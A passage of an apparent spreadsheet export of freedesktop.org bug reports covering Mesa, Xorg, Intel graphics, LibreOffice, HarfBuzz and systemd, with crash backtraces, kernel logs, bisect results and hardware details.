#8  0x004ecd3f in _mesa_glsl_compile_shader (ctx=0x8e7fbf0 shader=0x91c0750) at program/ir_to_mesa.cpp:3189
#9  0x0040af91 in compile_shader (ctx=0x8e7fbf0 shaderObj=1) at main/shaderapi.c:848
#10 0x0040b955 in _mesa_CompileShaderARB (shaderObj=1) at main/shaderapi.c:1188
#11 0x08069457 in test ()
#12 0x0806988e in main ()
(gdb) frame 4
#4  0x004f3829 in process_array_type (loc=0xbfc8b2b8 base=0x714ac0 array_size=0x91c6998 state=0x91c1f68) at ast_to_hir.cpp:1761
1761	      assert(dummy_instructions.is_empty())</t>
  </si>
  <si>
    <t>XORG-32190</t>
  </si>
  <si>
    <t>Tons of [drm:i915_gem_do_execbuffer] *ERROR* Failed to pin buffer</t>
  </si>
  <si>
    <t>On Linux (Ubuntu maverick 64bit with KDE kernel 2.6.35 xorg 1.9.0 intel drivers updated to 2.13.901+git20101124 via the glasen PPA) on a Dell E6500 laptop with Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07) I am experiencing general instability of the graphics stack particularly in conjunction with the following conditions:
1) compositing on + suspend/resume. At resume the screen is completely black and objects appear only flashing when the mouse goes over them.
2) compositing on + start/stop of the screensaver (same as above)
3) window movement (occasional freeze of the graphics stack)
4) attachment of an external screen when xrandr is used to set it not to clone the primary one (on the external screen the image is ok on the primary one the screen gets divided in two regions halfway. The top one shows what should be the bottom of the screen the bottom one shows garble).
5) screen saver starting when a secondary screen is attached and set not to clone the primary screen (occasional freeze of the graphics stack when the screensaver is stopped).
All the above does not happen repeatably but just occasionally thought quite frequently. At the same time I am seeing tons of the following in dmesg:
drm:i915_gem_do_execbuffer] *ERROR* Failed to pin buffer 16 of 32 total 3555328 bytes 31 fences: -28
[   36.405962] [drm:i915_gem_do_execbuffer] *ERROR* 690 objects [23 pinned] 65089536 object bytes [22482944 pinned] 22548480/234881024 gtt bytes
[   36.953175] [drm:i915_gem_do_execbuffer] *ERROR* Failed to pin buffer 16 of 31 total 3489792 bytes 30 fences: -28
[   36.953180] [drm:i915_gem_do_execbuffer] *ERROR* 736 objects [23 pinned] 67301376 object bytes [22482944 pinned] 22548480/234881024 gtt bytes
[   37.905765] [drm:i915_gem_do_execbuffer] *ERROR* Failed to pin buffer 16 of 32 total 3555328 bytes 31 fences: -28
[   37.905770] [drm:i915_gem_do_execbuffer] *ERROR* 768 objects [23 pinned] 69349376 object bytes [22482944 pinned] 22548480/234881024 gtt bytes
I wonder if the two things can be related.</t>
  </si>
  <si>
    <t>MESA-110861</t>
  </si>
  <si>
    <t>The Witcher 3: blocky shadow artifacts on distant objects</t>
  </si>
  <si>
    <t>There are blocky shadow artifacts on distant objects:
https://abload.de/img/tw3lyk3t.png
I think this is a regression in either radv or llvm as I can't recall seeing these artifacts the last time I tested with radv.
Funny: amdvlk had a similar (or even the very same?) issue and it got fixed with its latest update.
mesa-git  19.2.0_devel.111569.22025595f3f
llvm-libs-git  9.0.0_r318186.669775f9db7</t>
  </si>
  <si>
    <t>tempel.julian</t>
  </si>
  <si>
    <t>MESA-57699</t>
  </si>
  <si>
    <t>Created attachment 70801
lp_test_format.log
mesa: dbd6135bc1ba285128ab991c03c4df6fbd6fefe8 (master)
9f06061d50f90bf425a5337cea1b0adb94a46d25 is the first bad commit
commit 9f06061d50f90bf425a5337cea1b0adb94a46d25
Author: JosÃ© Fonseca 
Date:   Wed Nov 28 19:20:18 2012 +0000
    util/u_format: Kill util_format_is_array().
    It is buggy (it was giving wrong results for some of the formats with
    padding) and util_format_description::is_array already does precisely
    what's intended.
    Reviewed-by: Roland Scheidegger 
:040000 040000 acbb7501279a631c0f3e26c21f98e493fc23d551 23f59be31e2e9bdcc534e2745f0505938888bce2 M	src
bisect run success</t>
  </si>
  <si>
    <t>POPPLER-97159</t>
  </si>
  <si>
    <t>XRef::createDocInfoIfNoneExists() shouldn't presume that DocInfo is a dictionary</t>
  </si>
  <si>
    <t>If there is a PDF document which doesn't comply with the PDF reference and its DocInfo object is not a dictionary then XRef::createDocInfoIfNoneExists() will fail. And apparently (as Bug 97134 shows) there are such documents.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-41684</t>
  </si>
  <si>
    <t>Add text/x-uuencode</t>
  </si>
  <si>
    <t>Created attachment 52216
Add text/x-uuencode
.uue files are generally uuencoded files.</t>
  </si>
  <si>
    <t>DRI-44886</t>
  </si>
  <si>
    <t>[gm45] GPU locks up for a few seconds then recovers when using xscreensaver on random: Invalid GTT entry during fetch for host</t>
  </si>
  <si>
    <t>Forwarding this bug from Ubuntu reporter Beto1917:
http://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/899303
[Problem]
With xscreensaver set to random once in a while it freezes for a couple seconds recovers and then displays the Apport window to report the lockup.  The i915_error_state file and dmesg indicate that a GPU lockup occurred but the system recovered.
[Original Description]
crashed after xscreensaver started
ProblemType: Crash
DistroRelease: Ubuntu 12.04
Package: xserver-xorg-video-intel 2:2.15.901-1ubuntu3
ProcVersionSignature: Ubuntu 3.2.0-2.6-generic 3.2.0-rc3
Uname: Linux 3.2.0-2-generic i686
.tmp.unity.support.test.0:
ApportVersion: 1.90-0ubuntu1
Architecture: i386
Chipset: gm45
CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: compiz
Date: Fri Dec  2 14:37:51 2011
DistUpgraded: Log time: 2011-07-07 16:41:03.123900
DistroCodename: precise
DistroVariant: ubuntu
DuplicateSignature: [gm45] GPU lockup  EIR: 0x00000010 PGTBL_ER: 0x00000001 render.IPEHR: 0x60020100 Ubuntu 12.04
ExecutablePath: /usr/share/apport/apport-gpu-error-intel.py
ExtraDebuggingInterest: Yes whatever it takes to get this fixed in Ubuntu
GraphicsCard:
 Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller [8086:2a42] (rev 07) (prog-if 00 [VGA controller])
   Subsystem: Acer Incorporated [ALI] Device [1025:029b]
   Subsystem: Acer Incorporated [ALI] Device [1025:029b]
InstallationMedia: Ubuntu-Netbook 10.04 Lucid Lynx - Release i386 (20100429.4)
InterpreterPath: /usr/bin/python2.7
MachineType: Acer Aspire 1410
ProcCmdline: /usr/bin/python /usr/share/apport/apport-gpu-error-intel.py
ProcEnviron:
ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-3.2.0-2-generic root=UUID=34529bb0-121c-4f52-b1b7-6aca0f1c8e88 ro splash vga=789 quiet splash vt.handoff=7
RelatedPackageVersions:
 xserver-xorg             1:7.6+7ubuntu7
 libdrm2                  2.4.27-1ubuntu1
 xserver-xorg-video-intel 2:2.15.901-1ubuntu3
SourcePackage: xserver-xorg-video-intel
Title: [gm45] False GPU lockup  EIR: 0x00000010 PGTBL_ER: 0x00000001 render.IPEHR: 0x60020100
UpgradeStatus: Upgraded to precise on 2011-12-01 (1 days ago)
UserGroups:
dmi.bios.date: 09/08/2009
dmi.bios.vendor: INSYDE
dmi.bios.version: v0.3117
dmi.board.asset.tag: Base Board Asset Tag
dmi.board.name: Base Board Product Name
dmi.board.vendor: Acer
dmi.board.version: Base Board Version
dmi.chassis.type: 1
dmi.chassis.vendor: Chassis Manufacturer
dmi.chassis.version: Chassis Version
dmi.modalias: dmi:bvnINSYDE:bvrv0.3117:bd09/08/2009:svnAcer:pnAspire1410:pvrv0.3117:rvnAcer:rnBaseBoardProductName:rvrBaseBoardVersion:cvnChassisManufacturer:ct1:cvrChassisVersion:
dmi.product.name: Aspire 1410
dmi.product.version: v0.3117
dmi.sys.vendor: Acer
version.compiz: compiz 1:0.9.6+bzr20110929-0ubuntu7
version.libdrm2: libdrm2 2.4.27-1ubuntu1
version.libgl1-mesa-dri: libgl1-mesa-dri 7.11-0ubuntu4
version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
version.libgl1-mesa-glx: libgl1-mesa-glx 7.11-0ubuntu4
version.xserver-xorg-core: xserver-xorg-core 2:1.10.4-1ubuntu5
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.6.0-1ubuntu13
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:6.14.99~git20110811.g93fc084-0ubuntu1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.15.901-1ubuntu3
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:0.0.16+git20110411+8378443-1</t>
  </si>
  <si>
    <t>FONTCONFIG-16286</t>
  </si>
  <si>
    <t>fc-cat</t>
  </si>
  <si>
    <t>fc-cat doesn't tolerate trailing slash</t>
  </si>
  <si>
    <t>This should work:
$ fc-cat /usr/share/fonts/culmus/
/usr/share/fonts/culmus/: No such file or directory
This works:
$ fc-cat /usr/share/fonts/culmus</t>
  </si>
  <si>
    <t>LIBREOFFICE-44489</t>
  </si>
  <si>
    <t>MinGW: Will not launch</t>
  </si>
  <si>
    <t>Latest versions for example
tinderbox: tree: MASTER
tinderbox: pull time 2012-01-04 07:42:19
tinderbox: git sha1s
core:308b282a8e6a5e6b8bc60b16f7d293051d8ecb7f
binfilter:3699b9935500443746fc1d520b274dd54bc458b3
dictionaries:7ef74e0d0fa57cc7eeb34226072b4183f2475308
help:87c767e7ff586490378235635fec44b1d8e9de4e
will not launch for me. I double click soffice.exe or any other application will not start without any message.
Olser versions in parallel folders work without problems.</t>
  </si>
  <si>
    <t>HARFBUZZ-31995</t>
  </si>
  <si>
    <t>Resource leak in ::HB_ArabicShape</t>
  </si>
  <si>
    <t>Code analyser tool runned against QT including HarfBuzz reveiled resource leak in ::HB_ArabicShape
Fix proposal:
diff --git a/src/3rdparty/harfbuzz/src/harfbuzz-arabic.c b/src/3rdparty/harfbuzz/src/harfbuzz-arabic.c
index 3837087..51f839a 100644
--- a/src/3rdparty/harfbuzz/src/harfbuzz-arabic.c
+++ b/src/3rdparty/harfbuzz/src/harfbuzz-arabic.c
@@ -111116 +111122 @@ HB_Bool HB_ArabicShape(HB_ShaperItem *item)
     if (HB_SelectScript(item item-&gt;item.script == HB_Script_Arabic ? arabic_features : syriac_features)) {
         HB_Bool ot_ok
-        if (arabicSyriacOpenTypeShape(item &amp;ot_ok))
+        if (arabicSyriacOpenTypeShape(item &amp;ot_ok)) {
+            HB_FREE_STACKARRAY(shapedChars)
             return TRUE
-        if (ot_ok)
+        }
+        if (ot_ok) {
+            HB_FREE_STACKARRAY(shapedChars)
             return FALSE
             /* fall through to the non OT code*/
+        }
     }
 #endif
-    if (item-&gt;item.script != HB_Script_Arabic)
+    if (item-&gt;item.script != HB_Script_Arabic) {
+        HB_FREE_STACKARRAY(shapedChars)
         return HB_BasicShape(item)
+    }
     shapedString(item-&gt;string item-&gt;stringLength item-&gt;item.pos item-&gt;item.length shapedChars &amp;slen
                   item-&gt;item.bidiLevel % 2</t>
  </si>
  <si>
    <t>MESA-73777</t>
  </si>
  <si>
    <t>xf86drm.h:40:17: error: drm.h: No such file or directory</t>
  </si>
  <si>
    <t>mesa: 66fd5057d3ee1b3a7bce484eb0856b318a8ae4a4 (master)
swrast build regression on Ubuntu 10.04
$ ./autogen.sh --disable-dri --disable-egl --with-dri-drivers=swrast --with-gallium-drivers=
$ make
[...]
  CC     libloader_la-loader.lo
In file included from loader.c:72:
/usr/include/xf86drm.h:40:17: error: drm.h: No such file or directory
8c2e7fd8460750543367053b1be9368cc38e1d6a is the first bad commit
commit 8c2e7fd8460750543367053b1be9368cc38e1d6a
Author: Emil Velikov 
Date:   Fri Jan 10 23:36:16 2014 +0000
    loader: introduce the loader util lib
    All the various window system integration layers duplicate roughly the
    same code for figuring out device and driver name pci-id's etc.  Which
    is sad.  So extract it out into a loader util lib.
    v2 (Emil)
    * Separate the introduction of libloader from the code de-duplication.
    * Strip out non-pci devices support.
    * Add scons + Android build system support.
    * Add VISIBILITY_CFLAGS to avoid exporting the loader funcs.
    v3 (Emil)
    * PIPE_OS_ANDROID is undefined at this scope use ANDROID
    * Make sure we define _EGL_NO_DRM when building only swrast
    Signed-off-by: Rob Clark 
    Signed-off-by: Emil Velikov 
    Reviewed-by: Rob Clark 
    Reviewed-by: Kristian HÃ¸gsberg 
    Reviewed-by: Ian Romanick 
:100644 100644 c3c1f08f01d2e27a1d38cb549dcd288b013ba09d 05ed62f594188852830b9683e1f39d3b04a82405 M      Android.mk
:100644 100644 4da6c51d36bbdecc55952f8b3de73bb7b124ee79 9ca6704a3e13dfb2fb9d5ffe4b363850b4186e48 M      configure.ac
:040000 040000 22d3dff995203b1a74224904b5f005f4abb486ce eded964be918ba2c0ea997a455b8e868f77274c6 M      include
:040000 040000 a7b6a5e28620f308a5a74cfe8f9a8038ca8e7b0c a917e5ed832cf30906b2de09a114d0ac0b0acbc0 M      src</t>
  </si>
  <si>
    <t>WOCKY-23974</t>
  </si>
  <si>
    <t>undeclared dependency on certtool and libsasl2</t>
  </si>
  <si>
    <t>Wocky uses  without a configure.ac check.
Wocky also fails to build if certtool is missing due to a check in the Makefile. This is the wrong place for such checks: please do that in configure.ac (if certtool is still needed).
As a result of those checks not being in configure.ac Gabble 0.9.0's NEWS file does not mention the new dependencies.</t>
  </si>
  <si>
    <t>XORG-21464</t>
  </si>
  <si>
    <t>Crash in XkbSendMap</t>
  </si>
  <si>
    <t>I've been repeatedly hit with a crash bug in the past month. It was occuring apparently randomly (not on startup not easily correlating to any of my actions) and the result was an X crash. The only thing I could see is that most of the time the last line in Xorg.log was reading:
   [xkb] BOGUS LENGTH in write keyboard desc expected 5940 got 5956
(exact numbers were different each time)
(sometimes I had this line present multiple times in the logs)
After noticing a higher occurence of the crashes when using VMWare (more than once per day) and learning how to properly use gdb with X I was finally able to obtain a few clean traces.
Program received signal SIGABRT Aborted.
0xffffe424 in __kernel_vsyscall ()
(gdb) bt
#0  0xffffe424 in __kernel_vsyscall ()
#1  0xb7c9b640 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2  0xb7c9d008 in *__GI_abort () at abort.c:88
#3  0xb7cd8e1d in __libc_message (do_abort=2 fmt=0xb7db3188 *** glibc detected *** %s: %s: 0x%s ***\n) at ../sysdeps/unix/sysv/linux/libc_fatal.c:170
#4  0xb7cdf1d4 in malloc_printerr (action=2 str=0xb7db3260 double free or corruption (out) ptr=0xa153350) at malloc.c:5994
#5  0xb7ce1186 in *__GI___libc_free (mem=0xa153350) at malloc.c:3625
#6  0x08136241 in Xfree (ptr=0x0) at ../../os/utils.c:1165
#7  0x081903c1 in XkbSendMap (client=0x9f1e7a0 xkb=0xa0cd2c8 rep=0xbfe034e8) at ../../xkb/xkb.c:1409
#8  0x0819400c in ProcXkbGetKbdByName (client=0x9f1e7a0) at ../../xkb/xkb.c:5807
#9  0x0819a8f8 in ProcXkbDispatch (client=0x6) at ../../xkb/xkb.c:6690
#10 0x0808c7ff in Dispatch () at ../../dix/dispatch.c:437
#11 0x080719dd in main (argc=9 argv=0xbfe03734 envp=Cannot access memory at address 0xf33) at ../../dix/main.c:397
Program received signal SIGSEGV Segmentation fault.
(gdb) bt
#0  0xb7c28b98 in _int_free (av=0xb7d15140 mem=0x9464988) at malloc.c:4726
#1  0xb7c29186 in *__GI___libc_free (mem=0x9464988) at malloc.c:3625
#2  0x08136241 in Xfree (ptr=0xa517d) at ../../os/utils.c:1165
#3  0x081903c1 in XkbSendMap (client=0x92521a0 xkb=0x907a4f0 rep=0xbfc49f48) at ../../xkb/xkb.c:1409
#4  0x0819400c in ProcXkbGetKbdByName (client=0x92521a0) at ../../xkb/xkb.c:5807
#5  0x0819a8f8 in ProcXkbDispatch (client=0x50d517c) at ../../xkb/xkb.c:6690
#6  0x0808c7ff in Dispatch () at ../../dix/dispatch.c:437
#7  0x080719dd in main (argc=9 argv=0xbfc4a194 envp=0x50d517c) at ../../dix/main.c:397
  (traces were obtained using xorg-server-1.6.1 debian packages xserver-xorg-core 2:1.6.1-1 )
You can see that these two traces correspond to the same piece of code (Xkb) which show that the error in the log is actually related to the crash.  The outcome is not always the same though (abort or segfault).
The crash happens at the  xfree((char *)start)  in the end of XkbSendMap .</t>
  </si>
  <si>
    <t>flipwook</t>
  </si>
  <si>
    <t>SYSTEMD-48479</t>
  </si>
  <si>
    <t>Upgrade to systemd-44 renders the system unbootable</t>
  </si>
  <si>
    <t>Created attachment 59698
Screenshot showing systemd failing to boot
I upgraded systemd to version 44 on my exherbo system and ever since Systemd fails at boot time.
I've upgraded/reinstalled all the packages that install files to /etc/system/systemd and /lib/systemd and the directory /lib/systemd doesn't exist anymore. I've also checked for links under /etc/systemd and everything is in order.
(udev has been upgraded to 182.)
When system boots the root file system gets mounted successfully and systemd is started but freezes with the message failed to fully start up daemon: operation not permitted. The only option at this time is to hard reset my computer.
Systemd even fails to launch rescue and emergency shells with the same message.
Any pointers as to how I can debug this ?
I've tried to edit the source files inserting log_error statements to help diagnose the problem. It apparently continues to execute despite the above mentioned error message. I'm having hard time to figure out exactly at which point it bails out.
Any help in this direction will be highly appreciated.
Thanks
Alex</t>
  </si>
  <si>
    <t>Bworthalex</t>
  </si>
  <si>
    <t>LIBREOFFICE-35944</t>
  </si>
  <si>
    <t>Accessing bibliography in PostgreSQL database is really slow</t>
  </si>
  <si>
    <t>I've configured LibreOffice to get bibliography entries from local postgresql database (postgres 8.4.7) using JDBC driver version 8.4.701-1. Every operation accessing publications table is really slow (e.g. search item by its Identifier when inserting new bibliographic reference). It fully eats one CPU core for about several minutes. Publication table is rather small - about 100 tuples. CPU is used by soffice.bin process not postgresql itself. DBMS connection is in idle state. The same bug (http://openoffice.org/bugzilla/show_bug.cgi?id=28679) affects OpenOffice (at least all versions I used since 3.1 version). 
On other hand when you open this database in LibreOffice Database database access is fast.</t>
  </si>
  <si>
    <t>alp</t>
  </si>
  <si>
    <t>DRI-97211</t>
  </si>
  <si>
    <t>[SKL] Dell XPS 15 9550 w/HD Graphics 530 - screen wont turn on when resuming from suspend</t>
  </si>
  <si>
    <t>Created attachment 125550
dmesg drm-intel-nightly drm.debug=0x1e before suspend
When resuming my Dell XPS 15 9550 from a suspend the monitor won't turn on again. Tested all quirks available from pm-suspend it does not work.
It's not related to X11 it happens also if you suspend without starting X.
The machine also has an 960M nVIDIA card but the module is not loaded and the card is turned off with the help of the bbswitch module. Have tested with the nvidia driver loaded it makes no difference. No physical output on the laptop is wired to the nVIDIA card (tested with starting X with only nvidia loaded it shows no outputs available).
Tested both vanilla linux-kernel-4.7.0 and latest drm-intel-nightly (currently at 4ef516d46da2ae7091ef0b0b8d05f600d2e85ab8). Nothing seems to happen in dmesg with vanilla kernel but that was tested without drm.debug=0x1e log_buf_len=1M.
It also gets no error state after resuming from suspend:
# cat /sys/class/drm/card0/error
no error state collected
# lspci:
00:00.0 Host bridge: Intel Corporation Skylake Host Bridge/DRAM Registers (rev 07)
00:01.0 PCI bridge: Intel Corporation Skylake PCIe Controller (x16) (rev 07)
00:02.0 VGA compatible controller: Intel Corporation HD Graphics 530 (rev 06)
00:04.0 Signal processing controller: Intel Corporation Skylake Processor Thermal Subsystem (rev 07)
00:14.0 USB controller: Intel Corporation Sunrise Point-H USB 3.0 xHCI Controller (rev 31)
00:14.2 Signal processing controller: Intel Corporation Sunrise Point-H Thermal subsystem (rev 31)
00:15.0 Signal processing controller: Intel Corporation Sunrise Point-H Serial IO I2C Controller #0 (rev 31)
00:15.1 Signal processing controller: Intel Corporation Sunrise Point-H Serial IO I2C Controller #1 (rev 31)
00:16.0 Communication controller: Intel Corporation Sunrise Point-H CSME HECI #1 (rev 31)
00:17.0 SATA controller: Intel Corporation Sunrise Point-H SATA Controller [AHCI mode] (rev 31)
00:1c.0 PCI bridge: Intel Corporation Sunrise Point-H PCI Express Root Port #1 (rev f1)
00:1c.1 PCI bridge: Intel Corporation Sunrise Point-H PCI Express Root Port #2 (rev f1)
00:1d.0 PCI bridge: Intel Corporation Sunrise Point-H PCI Express Root Port #9 (rev f1)
00:1d.4 PCI bridge: Intel Corporation Sunrise Point-H PCI Express Root Port #13 (rev f1)
00:1d.6 PCI bridge: Intel Corporation Sunrise Point-H PCI Express Root Port #15 (rev f1)
00:1f.0 ISA bridge: Intel Corporation Sunrise Point-H LPC Controller (rev 31)
00:1f.2 Memory controller: Intel Corporation Sunrise Point-H PMC (rev 31)
00:1f.3 Audio device: Intel Corporation Sunrise Point-H HD Audio (rev 31)
00:1f.4 SMBus: Intel Corporation Sunrise Point-H SMBus (rev 31)
01:00.0 3D controller: NVIDIA Corporation GM107M [GeForce GTX 960M] (rev ff)
02:00.0 Network controller: Broadcom Corporation BCM43602 802.11ac Wireless LAN SoC (rev 01)
03:00.0 Unassigned class [ff00]: Realtek Semiconductor Co. Ltd. RTS525A PCI Express Card Reader (rev 01)
04:00.0 Non-Volatile memory controller: Toshiba America Info Systems Device 010f (rev 01)
06:00.0 PCI bridge: Intel Corporation DSL6340 Thunderbolt 3 Bridge [Alpine Ridge 2C 2015]
07:00.0 PCI bridge: Intel Corporation DSL6340 Thunderbolt 3 Bridge [Alpine Ridge 2C 2015]
07:01.0 PCI bridge: Intel Corporation DSL6340 Thunderbolt 3 Bridge [Alpine Ridge 2C 2015]
07:02.0 PCI bridge: Intel Corporation DSL6340 Thunderbolt 3 Bridge [Alpine Ridge 2C 2015]
3e:00.0 USB controller: Intel Corporation DSL6340 USB 3.1 Controller [Alpine Ridge]
# BIOS output from dmidecode:
...
Handle 0x0000 DMI type 0 24 bytes
BIOS Information
        Vendor: Dell Inc.
        Version: 01.02.10
        Release Date: 06/30/2016
        Address: 0xF0000
        Runtime Size: 64 kB
        ROM Size: 16384 kB
        Characteristics:
                PCI is supported
                PNP is supported
                BIOS is upgradeable
                BIOS shadowing is allowed
                Boot from CD is supported
                Selectable boot is supported
                EDD is supported
                5.25/1.2 MB floppy services are supported (int 13h)
                3.5/720 kB floppy services are supported (int 13h)
                3.5/2.88 MB floppy services are supported (int 13h)
                Print screen service is supported (int 5h)
                8042 keyboard services are supported (int 9h)
                Serial services are supported (int 14h)
                Printer services are supported (int 17h)
                ACPI is supported
                USB legacy is supported
                Smart battery is supported
                BIOS boot specification is supported
                Function key-initiated network boot is supported
                Targeted content distribution is supported
                UEFI is supported
        BIOS Revision: 1.2
...</t>
  </si>
  <si>
    <t>mads</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-32982</t>
  </si>
  <si>
    <t>account request for Aaron Seigo</t>
  </si>
  <si>
    <t>I'd like to request a git account for the purpose of contributing to the xdg specs repository.
Full name: Aaron Seigo
Project affiliation: KDE
EMail: aseigo@kde.org
Preferred account name: aseigo
gpg and ssh keys attached.</t>
  </si>
  <si>
    <t>aseigo</t>
  </si>
  <si>
    <t>MESA-106830</t>
  </si>
  <si>
    <t>[bisected] 32 bit tests (deqp piglit glcts vulkancts) crashing on all platforms</t>
  </si>
  <si>
    <t xml:space="preserve">deqp glcts piglit and vulkancts tests are all crashing when run with 32 bit Mesa.This seems to affect every platform except G33.
This has been bisected to this commit:
commit 6a9525bf6729a8d2bb9c6a7b10ebdc9925c55463 (refs/bisect/bad)
Author: Jason Ekstrand 
Date:   Tue May 29 14:37:35 2018 -0700
    intel/eu: Switch to a logical state stack
    Instead of the state stack that's based on copying a dummy instruction
    around we start using a logical stack of brw_insn_states.  This uses a
    bit less memory and is way less conceptually bogus.
    Reviewed-by: Kenneth Graunke </t>
  </si>
  <si>
    <t>MESA-65193</t>
  </si>
  <si>
    <t>[bisected] r600g can't launch Gnome Shell and KDE since mesa updated to 5de41575a127eb8a6a0fe5c71a73b372f9b89f53</t>
  </si>
  <si>
    <t>I haven't been able to log in Gnome Shell or KDE lately since I updated mesa from git. Using XFCE and doing some tests I've found out glxgears returns an assertion error when launch. glxgears fails with the following error:
sb/sb_expr.cpp:455:fold_alu_op2: Assertion `v0 &amp;&amp; v1 &amp;&amp; n.dst[0]' failed.
line 6: 15521 Trace/breakpoint trap   (core dumped) $1
Bisecting ended up point to culprit commit:
commit 5de41575a127eb8a6a0fe5c71a73b372f9b89f53
Author: Vadim Girlin 
Date:   Mon May 27 14:23:47 2013 +0400
    r600g/sb: improve folding for SETcc
    Signed-off-by: Vadim Girlin 
:040000 040000 96a6fd8851d84f62896ecfba6c4a7df5a7963325 ade9a1e6d7fd56ed8cf413a2138c38011f1b9827 M	src
Using latest drm ddx from git on a Radeon HD6950 Cayman.</t>
  </si>
  <si>
    <t>MESA-95537</t>
  </si>
  <si>
    <t>Invalid argument  in anv_ioctl called from anv_physical_device_init</t>
  </si>
  <si>
    <t>When calling vkEnumeratePhysicalDevices it ends up failing at the ioctl call within anv_physical_device_init. It correctly opens the device /dev/dri/renderD128 but then fails with invalid argument when it tries to get the chipset id.
This is run on a i7-3630QM with a HD4000. There is also a GTX 675MX present but it's not used.
Im running an updated Arch-Linux system (23 May 2016)
I build mesa with debug enabled and used the intel_vulkan library but when trying to run any vulkan application (like vulkaninfo) it fails with 
anv_device.c:77: failed to get chipset id: Invalid argument (VK_ERROR_INITIALIZATION_FAILED)</t>
  </si>
  <si>
    <t>xonar.leroux</t>
  </si>
  <si>
    <t>MESA-91044</t>
  </si>
  <si>
    <t>piglit spec/egl_khr_create_context/valid debug flag gles* fail</t>
  </si>
  <si>
    <t>When running piglit test on egl_x11 platform I accidentally noticed that piglit test spec/egl_khr_create_context/valid debug flag gles{123} fail. The reason is that mesa EGL gives unexpected EGL_BAD_ATTRIBUTE. Digging into the EGL code I found libEGL will give EGL_BAD_ATTRIBUTE when setting EGL_CONTEXT_FLAGS_KHR in non-OpenGL contexts (including OpenGL ES context) with the quote in comment:
 /* The EGL_KHR_create_context spec says:
  *
  *     Flags are only defined for OpenGL context creation and
  *     specifying a flags value other than zero for other types of
  *     contexts including OpenGL ES contexts will generate an
  *     error.
  */
However I can't find the words quoted in the present EGL_KHR_create_context spec. On the other hand it allows creating debug context in OpenGL ES (i.e. setting EGL_CONTEXT_OPENGL_DEBUG_BIT_KHR in EGL_CONTEXT_FLAGS_KHR).
Should we just remove the non-OpenGL check or just allow EGL_CONTEXT_OPENGL_DEBUG_BIT_KHR in OpenGL ES context?</t>
  </si>
  <si>
    <t>stu_dby</t>
  </si>
  <si>
    <t>XORG-93554</t>
  </si>
  <si>
    <t>X.org crashes intermittently randomly on Intel graphics</t>
  </si>
  <si>
    <t>As reported in (https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/1522727).
Since upgrading to Ubuntu 15.10 X.org crashes intermittently. The screen will suddenly turn black and after a few seconds the LightDM login screen appears. All unsaved work is lost of course.
A clean install of 15.10 did not help the problem persists.
It happens absolutely randomly. I haven't been able to figure out any pattern related to time or specific user interaction that would cause this except that I believe the crash is always triggered by some kind of input device action i.e. mouse click or key press. The system won't crash if I don't actively do any work.
ProblemType: Bug
DistroRelease: Ubuntu 15.10
Package: xserver-xorg-core 2:1.17.2-1ubuntu9.1
ProcVersionSignature: Ubuntu 4.2.0-19.23-generic 4.2.6
Uname: Linux 4.2.0-19-generic x86_64
.tmp.unity.support.test.0:
ApportVersion: 2.19.1-0ubuntu5
Architecture: amd64
BootLog:
Â Scanning for Btrfs filesystems
Â fsck from util-linux 2.26.2
Â /dev/sda1: clean 365974/2501856 files 2841542/9999755 blocks
CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: compiz
CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0'
CompositorUnredirectFSW: true
CurrentDesktop: Unity
Date: Fri Dec  4 08:50:28 2015
DistUpgraded: Fresh install
DistroCodename: wily
DistroVariant: ubuntu
DkmsStatus:
Â acpi-call 1.1.0 4.2.0-18-generic x86_64: installed
Â acpi-call 1.1.0 4.2.0-19-generic x86_64: installed
Â vboxhost 5.0.8 4.2.0-18-generic x86_64: installed
Â vboxhost 5.0.8 4.2.0-19-generic x86_64: installed
ExtraDebuggingInterest: Yes if not too technical
GraphicsCard:
Â Intel Corporation 3rd Gen Core processor Graphics Controller [8086:0166] (rev 09) (prog-if 00 [VGA controller])
Â Â Â Subsystem: Lenovo Device [17aa:21fb]
InstallationDate: Installed on 2015-10-25 (39 days ago)
InstallationMedia: Ubuntu 15.10 Wily Werewolf - Release amd64 (20151021)
MachineType: LENOVO 2356AB2
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.2.0-19-generic root=UUID=794b7585-5080-4bd4-a642-688538787fea ro quiet splash vt.handoff=7
SourcePackage: xorg-server
UdevLog: Error: [Errno 2] No such file or directory: '/var/log/udev'
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 11/12/2012
dmi.bios.vendor: LENOVO
dmi.bios.version: G7ET63WW (2.05 )
dmi.board.asset.tag: Not Available
dmi.board.name: 2356AB2
dmi.board.vendor: LENOVO
dmi.board.version: Not Defined
dmi.chassis.asset.tag: No Asset Information
dmi.chassis.type: 10
dmi.chassis.vendor: LENOVO
dmi.chassis.version: Not Available
dmi.modalias: dmi:bvnLENOVO:bvrG7ET63WW(2.05):bd11/12/2012:svnLENOVO:pn2356AB2:pvrThinkPadT430s:rvnLENOVO:rn2356AB2:rvrNotDefined:cvnLENOVO:ct10:cvrNotAvailable:
dmi.product.name: 2356AB2
dmi.product.version: ThinkPad T430s
dmi.sys.vendor: LENOVO
version.compiz: compiz 1:0.9.12.2+15.10.20151015-0ubuntu1
version.ia32-libs: ia32-libs N/A
version.libdrm2: libdrm2 2.4.64-1
version.libgl1-mesa-dri: libgl1-mesa-dri 11.0.2-1ubuntu4
version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
version.libgl1-mesa-glx: libgl1-mesa-glx 11.0.2-1ubuntu4
version.xserver-xorg-core: xserver-xorg-core 2:1.17.2-1ubuntu9.1
